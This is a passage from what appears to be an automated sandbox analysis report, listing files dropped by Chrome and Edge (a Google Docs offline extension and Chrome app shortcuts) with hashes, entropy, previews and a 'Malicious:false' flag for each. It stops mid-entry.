                                                                                                                                                                                                                                                                                                                          MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                          SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                          SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                          SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2525
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                                          MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                                          SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                                          SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                                          SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                          MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                          SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                          SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                          SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):122218
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                                          MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                                          SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                                          SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                                          SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):291
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                          MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                          SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                          SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                          SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):130866
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                                          MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                                          SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                                          SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                                          SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 15:22:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2677
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9878965204760166
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8D2dRjT5JJfH2idAKZdA19ehwiZUklqehRy+3:8DMjnJ0+y
                                                                                                                                                                                                                                                                                                                          MD5:D6C88BB115238F044502A05438AFBC36
                                                                                                                                                                                                                                                                                                                          SHA1:06644BDFC74E488B9E315146EA0E605C1781A596
                                                                                                                                                                                                                                                                                                                          SHA-256:F701592ECFECE21C55E12ACFF1408013D857DF4AA3C36BD8B790E899DBAB6707
                                                                                                                                                                                                                                                                                                                          SHA-512:CD433117AE0E5218FA8E81BFE48AC6F3570BB29D6489144F894F59557DBC181D3C2D9C5B86E1E2DB8E0D040E529A06A7573D580A092972EF5B40BDB540145E67
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......<.e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............k.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 15:22:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2679
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.998653699109375
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8X0M2dRjT5JJfH2idAKZdA1weh/iZUkAQkqehuy+2:8EMMjnJG9Qzy
                                                                                                                                                                                                                                                                                                                          MD5:66D88313A739178AAF0EC82E18E35F23
                                                                                                                                                                                                                                                                                                                          SHA1:6C420537B3F3A6B84000F6230BC059AE373127F3
                                                                                                                                                                                                                                                                                                                          SHA-256:622679AAA822428DFB26871A6C24F1A0437803533098EC97E7D6EDDDB6F20D85
                                                                                                                                                                                                                                                                                                                          SHA-512:5AC7AC8EF78B61310E4FBE6F53E09A45CFCB68003F1E9028CF652478FC5BE160328766F431AA718D75069A149185E9C75F9A34E98072F20E4689599238D6B722
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......n<.e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............k.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2693
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.012031383982431
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8xKdRjT5JsH2idAKZdA14tseh7sFiZUkmgqeh7sYy+BX:8xgjnHnqy
                                                                                                                                                                                                                                                                                                                          MD5:4034C1747F9310C27DDEE0922FF80CCE
                                                                                                                                                                                                                                                                                                                          SHA1:39EACD92CD4481F6F68D8B1D447B51FAD877750F
                                                                                                                                                                                                                                                                                                                          SHA-256:E2ED38A1CF2951042D539864CC36D2AB802CD3AE94B641E1B99FD80BBF108FFB
                                                                                                                                                                                                                                                                                                                          SHA-512:38C062E757C4F1FD9985DB9CEE8E8381C2D7A88A930D07037C38BBA6C4E30C787D310DDA9543B53140D85D2E3C266DCB26F4255C797172D83F2895BE3AFBDA19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............k.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 15:22:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9991865250141743
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8x2dRjT5JJfH2idAKZdA1vehDiZUkwqehCy+R:8xMjnJNQy
                                                                                                                                                                                                                                                                                                                          MD5:3678F19793ED0A213C2A07AF8C3C6AB1
                                                                                                                                                                                                                                                                                                                          SHA1:ED6AD31282496E392BAFB54B7F8F7B58095DBBF2
                                                                                                                                                                                                                                                                                                                          SHA-256:E2CA396258C0A06C83898322F1EB0DFDCD42CEDA1412FC772948322085090F20
                                                                                                                                                                                                                                                                                                                          SHA-512:2E511DA63E8951DF11CB10DE392562DC4864229F298BC992B2E15BDA32BFCC128A70E481451F7DA42863321A657B505CC25301B78F786101FAA05D868EC062DE
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......b<.e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............k.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 15:22:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9877998443359073
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:812dRjT5JJfH2idAKZdA1hehBiZUk1W1qehEy+C:81MjnJN9ky
                                                                                                                                                                                                                                                                                                                          MD5:166328156AFC8800A281047363798898
                                                                                                                                                                                                                                                                                                                          SHA1:89C0DC9DD881742D1D1C22C797EB7B6A38E83DB2
                                                                                                                                                                                                                                                                                                                          SHA-256:21BA24F220A28CBC6D02EF93B422EF62BF9F763AE5A95FB54C2B0E2CDE72A0CE
                                                                                                                                                                                                                                                                                                                          SHA-512:328B61AE04A260E77FEA1190761F2A8B93AD8AE27A9D0E4373C0815B919C8ABC9FEDFF7D6381849404ACEADBCEBB5B37114659E7F52C1DA85DC5FBB502320C85
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....9d{<.e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............k.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 15:22:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2683
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.000283553980555
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8x2dRjT5JJfH2idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbqy+yT+:8xMjnJRT/TbxWOvTbqy7T
                                                                                                                                                                                                                                                                                                                          MD5:D49049D16B46F1464435913A2E7D143D
                                                                                                                                                                                                                                                                                                                          SHA1:397E3F5A356DC0B3B32281349299F5D42CC2BB11
                                                                                                                                                                                                                                                                                                                          SHA-256:ED122223D9539040FF936DF37429F88D9AC92ACACF5A6C8AE4587E3042572B08
                                                                                                                                                                                                                                                                                                                          SHA-512:C1DA6D99B6202C8F7C9BB512C6748B4F65C1607113CE63E29B1500BF001D88BDD6DC9347B67C2E8A433AFADBD9AB0905FB649B72864ADF76B60CBA5338F4BE78
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......W<.e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............k.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 467

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8911)
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):8917
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.777967480289095
                                                                                                                                                                                                                                                                                                                          Encrypted:false
